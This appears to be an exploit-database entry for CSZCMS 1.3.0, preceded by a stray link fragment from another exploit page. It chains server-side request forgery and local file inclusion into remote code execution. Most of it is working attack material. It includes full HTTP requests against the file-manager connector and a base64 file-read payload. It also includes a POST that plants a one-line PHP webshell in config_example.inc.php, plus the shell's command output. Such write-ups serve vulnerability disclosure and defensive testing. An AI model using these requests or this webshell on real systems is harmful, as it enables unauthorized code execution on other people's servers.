[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application) ## Proof and Exploit: [href](https://streamable.com/lpwxr4) </code></pre>

<pre><code># Title: CSZCMS V1.3.0 - SSRF To LFI To Rce # Author: Hejap Zairy # Date: 07.04.2022 # Vendor: https://sourceforge.net/projects/cszcms/files/install/ # Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # 1 - step inject ssrf # 2 - inject SSRF to LFI # 3 - Inject SSRF to LFI to RCE put webshell config #vulnerability Code php Needs more filtering commands ``` protected static $base64encodeSessionData = false; protected $commands = array( 'abort' => array('id' => true), 'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false), 'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false), 'chmod' => array('targets' => true, 'mode' => true), 'dim' => array('target' => true, 'substitute' => false), 'duplicate' => array('targets' => true, 'suffix' => false), 'editor' => array('name' => true, 'method' => true, 'args' => false), 'extract' => array('target' => true, 'mimes' => false, 'makedir' => false), 'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false), 'get' => array('target' => true, 'conv' => false), 'info' => array('targets' => true, 'compare' => false), 'ls' => array('target' => true, 'mimes' => false, 'intersect' => false), 'mkdir' => array('target' => true, 'name' => false, 'dirs' => false), 'mkfile' => array('target' => true, 'name' => true, 'mimes' => false), 'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false), 'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false), 'parents' => array('target' => true, 'until' => false), 'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false), 'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false), 'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false), 'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false), 'rm' => array('targets' => true), 'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false), 'size' => array('targets' => true), 'subdirs' => array('targets' => true), 'tmb' => array('targets' => true), 'tree' => array('target' => true), 'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false), 'url' => array('target' => true, 'options' => false), 'zipdl' => array('targets' => true, 'download' => false) ); ``` [+] Payload GET #l1_MGRheS5waHA= base64 decode 0day.php #l3_Y3N6ZGVmYXVsdC9tYWluLnBocA base64 decode main.php ``` GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1 Host: 127.0.0.1 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn Connection: close ``` #Status: CRITICAL #Response ``` {"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="} # <?=`$_GET[515]`?> decode base64 ``` # Requests ``` POST /cms/admin/filemanager/connector/ HTTP/1.1 Host: 127.0.0.1 Content-Length: 128 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/cms/admin/filemanager Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed Connection: close cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32 ``` #Response ``` HTTP/1.1 200 OK Date: Thu, 07 Apr 2022 06:31:19 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=3600, must-revalidate Pragma: no-cache Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly Content-Length: 190 Connection: keep-alive, close Content-Type: application/json; charset=utf-8 {"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]} ``` #webshell ``` GET /cms/config_example.inc.php?515=dir HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed Connection: close ``` #response ``` HTTP/1.1 200 OK Date: Thu, 07 Apr 2022 06:37:33 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Powered-By: PHP/7.4.27 Connection: keep-alive, close Cache-Control: max-age=3600, must-revalidate Content-Length: 1917 Content-Type: text/html; charset=UTF-8 Volume in drive C is OS Volume Serial Number is 2EF1-9DCA Directory of C:\xampp\htdocs\cms 04/07/2022 09:13 AM <DIR> . 04/07/2022 02:23 AM <DIR> .. 04/30/2019 05:29 PM 8,444 .htaccess 04/07/2022 09:13 AM <DIR> .quarantine 04/07/2022 09:13 AM <DIR> .tmb 04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv 04/07/2022 07:14 AM 5,362 127.0.0.1_files_20220407.zip 04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip 04/07/2022 06:57 AM <DIR> assets 04/09/2018 03:34 PM 479 cache.config.inc.php 11/29/2021 07:40 AM 4,733 CHANGELOG 04/07/2022 06:55 AM 696 config.inc.php 04/07/2022 09:37 AM 17 config_example.inc.php 08/07/2018 05:18 AM 4,075 CONTRIBUTING.md 04/21/2021 07:01 AM 151,259 corecss.css 04/21/2021 07:01 AM 378,086 corejs.js 04/07/2022 06:57 AM <DIR> cszcms 06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php 04/07/2022 06:55 AM 690 env.config.inc.php 04/07/2022 06:55 AM 269 htaccess.config.inc.php 06/28/2019 02:48 PM 11,526 index.php 04/07/2022 06:57 AM <DIR> install 01/28/2020 06:40 AM 3,439 LICENSE.md 04/09/2018 03:35 PM 336 memcached.config.inc.php 04/09/2018 03:34 PM 1,297 nginx_example.com.conf 04/07/2022 09:13 AM <DIR> photo 04/09/2021 09:52 AM 1,744 proxy.inc.php 11/11/2021 07:48 AM 1,868 README.md 04/09/2018 03:35 PM 496 redis.config.inc.php 11/11/2021 07:46 AM 520 SECURITY.md 04/07/2022 06:57 AM <DIR> system 04/07/2022 09:13 AM <DIR> templates 22 File(s) 630,398 bytes 10 Dir(s) 80,676,995,072 bytes free ``` # Description: the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials to Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce # Proof and Exploit: https://i.imgur.com/pzWjkXI.png https://i.imgur.com/xxjxnGk.png https://i.imgur.com/S1F7MaJ.png https://i.imgur.com/BwWTfYU.png </code></pre>